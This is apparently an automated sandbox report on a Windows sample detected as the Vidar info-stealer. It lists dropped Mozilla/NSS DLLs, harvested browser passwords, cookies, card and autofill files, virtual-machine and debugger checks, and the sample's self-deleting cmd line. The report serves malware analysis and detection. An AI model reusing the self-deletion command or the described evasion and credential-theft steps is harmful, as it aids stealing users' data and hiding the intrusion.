                        Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "T6zZFfRLqs.exe")
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\freebl3[1].dllJump to behavior
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/18@1/3
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                        Source: softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                        Source: softokn3.dll.1.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                        Source: T6zZFfRLqs.exe, 00000001.00000002.397914082.00000000021F0000.00000040.00000001.sdmp, nss3[1].dll.1.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                        Source: nss3[1].dll.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);m
                        Source: T6zZFfRLqs.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                        Source: T6zZFfRLqs.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                        Source: softokn3.dll.1.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                        Source: T6zZFfRLqs.exe, nss3[1].dll.1.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                        Source: softokn3.dll.1.drBinary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
                        Source: T6zZFfRLqs.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                        Source: nss3[1].dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                        Source: nss3[1].dll.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                        Source: nss3[1].dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                        Source: softokn3.dll.1.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                        Source: softokn3.dll.1.drBinary or memory string: SELECT ALL id FROM %s;
                        Source: softokn3.dll.1.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                        Source: softokn3.dll.1.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                        Source: T6zZFfRLqs.exe, nss3[1].dll.1.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                        Source: T6zZFfRLqs.exe, nss3[1].dll.1.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                        Source: nss3[1].dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                        Source: nss3[1].dll.1.drBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
                        Source: softokn3.dll.1.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                        Source: nss3[1].dll.1.drBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: 1_2_00417000 _malloc,CreateToolhelp32Snapshot,CloseHandle,Process32First,Process32Next,Process32Next,CloseHandle,
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6828:120:WilError_01
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                        Source: T6zZFfRLqs.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.1.dr
                        Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3[1].dll.1.dr
                        Source: Binary string: vcruntime140.i386.pdb source: vcruntime140[1].dll.1.dr
                        Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140[1].dll.1.dr
                        Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.1.dr
                        Source: Binary string: 0C:\zevubur.pdb source: T6zZFfRLqs.exe
                        Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: mozglue[1].dll.1.dr
                        Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.1.dr
                        Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: mozglue[1].dll.1.dr
                        Source: Binary string: C:\zevubur.pdb source: T6zZFfRLqs.exe
                        Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.1.dr
                        Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: nss3[1].dll.1.dr
                        Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3[1].dll.1.dr

                        Data Obfuscation:

                        barindex
                        Detected unpacking (overwrites its own PE header)Show sources
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeUnpacked PE file: 1.2.T6zZFfRLqs.exe.400000.0.unpack
                        Detected unpacking (changes PE section rights)Show sources
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeUnpacked PE file: 1.2.T6zZFfRLqs.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;
                        Source: mozglue[1].dll.1.drStatic PE information: section name: .didat
                        Source: mozglue.dll.1.drStatic PE information: section name: .didat
                        Source: msvcp140[1].dll.1.drStatic PE information: section name: .didat
                        Source: msvcp140.dll.1.drStatic PE information: section name: .didat
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: 1_2_0041A730 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,WideCharToMultiByte,WideCharToMultiByte,_fprintf,WideCharToMultiByte,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,FreeLibrary,
                        Source: initial sampleStatic PE information: section name: .text entropy: 7.9868866426
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\mozglue[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\nss3[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\freebl3[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\softokn3[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\msvcp140[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\vcruntime140[1].dllJump to dropped file

                        Hooking and other Techniques for Hiding and Protection:

                        barindex
                        Self deletion via cmd deleteShow sources
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeProcess created: 'C:\Windows\System32\cmd.exe' /c taskkill /im T6zZFfRLqs.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\T6zZFfRLqs.exe' & del C:\ProgramData\*.dll & exit
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeProcess created: 'C:\Windows\System32\cmd.exe' /c taskkill /im T6zZFfRLqs.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\T6zZFfRLqs.exe' & del C:\ProgramData\*.dll & exit
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: 1_2_00496880 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\timeout.exe TID: 6920Thread sleep count: 48 > 30
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\mozglue[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeDropped PE file which has not been started: C:\ProgramData\mozglue.dllJump to dropped file
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\nss3[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeDropped PE file which has not been started: C:\ProgramData\msvcp140.dllJump to dropped file
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\freebl3[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\softokn3[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeDropped PE file which has not been started: C:\ProgramData\vcruntime140.dllJump to dropped file
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\msvcp140[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\vcruntime140[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: 1_2_00492480 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00492694h
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeRegistry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeProcess information queried: ProcessInformation
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: 1_2_0044E950 GetSystemInfo,
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: 1_2_0041B590 _sprintf,FindFirstFileA,_sprintf,FindNextFileA,FindClose,
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: 1_2_00496670 FindFirstFileW,FindNextFileW,FindNextFileW,
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: 1_2_0041B810 __wgetenv,_sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CreateDirectoryA,CopyFileA,FindNextFileA,FindClose,
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: 1_2_0040EB20 _sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CopyFileA,FindNextFileA,FindClose,
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: 1_2_00405D80 _memset,_memset,_memset,_memset,lstrcpyW,lstrcpyW,lstrcatW,lstrcatW,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,PathMatchSpecW,DeleteFileW,PathMatchSpecW,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileW,lstrcpyW,lstrcatW,_memset,_memset,_memset,_memset,FindClose,FindClose,_memset,_memset,_memset,_memset,
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: 1_2_0040F150 _strtok,_strtok,_memmove,_memmove,__wgetenv,_memmove,__wgetenv,_memmove,_memmove,_memmove,_memmove,_memmove,GetLogicalDriveStringsA,_strtok,GetDriveTypeA,_strtok,
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
                        Source: T6zZFfRLqs.exe, 00000001.00000002.397837562.000000000082A000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                        Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:NT
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: 1_2_004A31A7 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: 1_2_0041A730 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,WideCharToMultiByte,WideCharToMultiByte,_fprintf,WideCharToMultiByte,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,FreeLibrary,
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: 1_2_0041A030 GetProcessHeap,HeapAlloc,_strcpy_s,
                        Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: 1_2_00401000 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: 1_2_004A31A7 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im T6zZFfRLqs.exe /f
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /im T6zZFfRLqs.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\T6zZFfRLqs.exe' & del C:\ProgramData\*.dll & exit
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im T6zZFfRLqs.exe /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 6
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeQueries volume information: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\Autofill\Google Chrome_Default.txt VolumeInformation
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeQueries volume information: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\CC\Google Chrome_Default.txt VolumeInformation
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeQueries volume information: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\Cookies\Edge_Cookies.txt VolumeInformation
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeQueries volume information: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\Cookies\Google Chrome_Default.txt VolumeInformation
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeQueries volume information: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\Cookies\IE_Cookies.txt VolumeInformation
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeQueries volume information: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\Downloads\Google Chrome_Default.txt VolumeInformation
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeQueries volume information: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\Files\Default.zip VolumeInformation
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeQueries volume information: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\History\Google Chrome_Default.txt VolumeInformation
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeQueries volume information: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\information.txt VolumeInformation
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeQueries volume information: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\passwords.txt VolumeInformation
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeQueries volume information: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\screenshot.jpg VolumeInformation
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,_memmove,_memmove,_memset,LocalFree,
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: 1_2_00492360 GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: 1_2_00492360 GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: 1_2_0041F2B3 __wgetenv,__wgetenv,__wgetenv,_memset,GetVersionExA,CreateDirectoryA,_memset,__wgetenv,DeleteFileA,DeleteFileA,DeleteFileA,
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: 1_2_00491AC0 GetUserNameA,

                        Stealing of Sensitive Information:

                        barindex
                        Yara detected VidarShow sources
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Yara detected Vidar stealerShow sources
                        Source: Yara matchFile source: 1.2.T6zZFfRLqs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.T6zZFfRLqs.exe.21f0e50.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.T6zZFfRLqs.exe.21f0e50.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.3.T6zZFfRLqs.exe.2330000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.T6zZFfRLqs.exe.400000.0.unpack, type: UNPACKEDPE
